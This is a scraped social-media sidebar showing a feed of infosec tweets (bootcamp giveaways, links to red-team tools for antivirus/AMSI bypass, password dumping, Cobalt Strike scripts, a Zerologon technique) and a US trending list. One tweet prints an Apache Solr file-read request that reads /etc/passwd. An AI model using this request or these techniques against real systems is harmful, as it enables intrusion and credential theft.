Bạn có thể thích
🚨 I am giving away 1 seat each of our June Red team (CRTP) and Azure (CARTP) bootcamps. 🚨 Repost, like and reply to this tweet to participate. I will announce the winners on Monday (27th May). alteredsecurity.com/bootcamps #redteam #pentest #giveaway
Giveaway time! To celebrate 80k followers! We are going to give a 1-month voucher to **80** people who RT this tweet (picked randomly)! We are going to send our socks, t-shirt and few goodies to one person who follows @PentesterLab and likes this tweet (picked randomly)!!
Giveaway time! We are going to send a t-shirt and few goodies to one person who follows @PentesterLab and likes this tweet !! And we are going to give a 1-year voucher to someone who RT this tweet!
How to discover up to 10,000 subdomains with your own tool | by _Y000_ | Mar, 2021 | InfoSec Write-ups infosecwriteups.com/this-time-you-…
Apache solr Arbitrary file read. POC: Request: POST /solr/db/debug/dump?param=ContentStreams stream.url=file//etc/passwd Response: 200 ... root:x:0:0... mp.weixin.qq.com/s?__biz=Mzg3ND…
SharpEDRChecker - Checks Running Processes, Process Metadata, DLLs Loaded Into Your Current Process And The Eac... j.mp/2YrqgrT
Releasing PyBeacon. A collection of scripts for dealing with Cobalt Strike beacons in Python. Covers: - staging - asymmetric encryption and metadata parsing - symmetric encryption (tasks) and decoding - beacon registration - beacon callbacks github.com/nccgroup/pybea…
Hide your Powershell script in plain sight. Bypass all (a lot of ;-) Powershell security features #infosec #pentest #redteam github.com/OmerYa/Invisi-…
I mapped active Cobalt Strike servers in the wild (over 450). Some of them could be legit Red Team Ops. However, the majority probably belongs to APT/Ransomware groups. docs.google.com/spreadsheets/d… cc @cyb3rops
HppDLL - local password dumping using MsvpPasswordValidate hooks github.com/last-byte/HppD…
Advanced Boolean-Based SQLi Filter Bypass Techniques secjuice.com/advanced-sqli-…
It has a few more prerequisites, but I finally managed to get a #Zerologon exploit working that doesn't rely on resetting passwords to exploit. Use the printerbug to make DC1 connect to you, then with lots of magic relay that to DC2 directly to DRSUAPI to DCSync 😁
👽A few days, I viewed this PDF, I believe it can help many people. It talks about API tests. I don't know who the owner is. But congratulations. 🤖 Some already used to search for bugs. docdro.id/TqEDnLJ #bugbounty #bugbountytips #bughunter #KingOfBugBountyTips
I just uploaded some of the most common file types for my Patrik's Bug Bounty Tools mind map here: SVG: blog.it-securityguard.com/pbbt.svg PDF: blog.it-securityguard.com/pbbt.pdf XMIND: blog.it-securityguard.com/pbbt.xmind PNG: blog.it-securityguard.com/pbbt.png enjoy! 🥰🥳👑 #bugbountytips #BugBounty
Chimera - PowerShell Obfuscation Script Designed To Bypass AMSI And Commercial Antivirus Solutions ift.tt/3hys49j
A simple Bash script for Bug Bounty reconnaissance, intended for headless use. Low on resources, high on information output. github.com/chvancooten/Bu…
RustScan - Turns a 17 minutes Nmap scan into 19 seconds 😲 - I haven't tested it, but 2.2k Stars & 170 Forks are a good sign 😉 #infosec #pentest #bugbounty github.com/RustScan/RustS…
Build your own AD with 0 effort. 1) blog.focal-point.com/how-to-build-a… 2) Populate it github.com/davidprowe/Bad… 3) Add misconfigurations medium.com/@vartaisecurit…
United States Xu hướng
- 1. #DWTS 47.4K posts
- 2. Harden 7,563 posts
- 3. Giannis 26.2K posts
- 4. Clippers 9,984 posts
- 5. Whitney 14.9K posts
- 6. #RHOSLC 6,862 posts
- 7. Brunson 6,983 posts
- 8. Kawhi 2,534 posts
- 9. Markstrom 1,621 posts
- 10. #Blackhawks 2,440 posts
- 11. Elaine 42.5K posts
- 12. Ryan Rollins 2,700 posts
- 13. Sixers 22.4K posts
- 14. Bucks 28.8K posts
- 15. UTEP 1,972 posts
- 16. Alix 6,501 posts
- 17. Connor Bedard 4,454 posts
- 18. Caden 7,610 posts
- 19. Andy 66.3K posts
- 20. Don Lemon 9,640 posts
Something went wrong.
Something went wrong.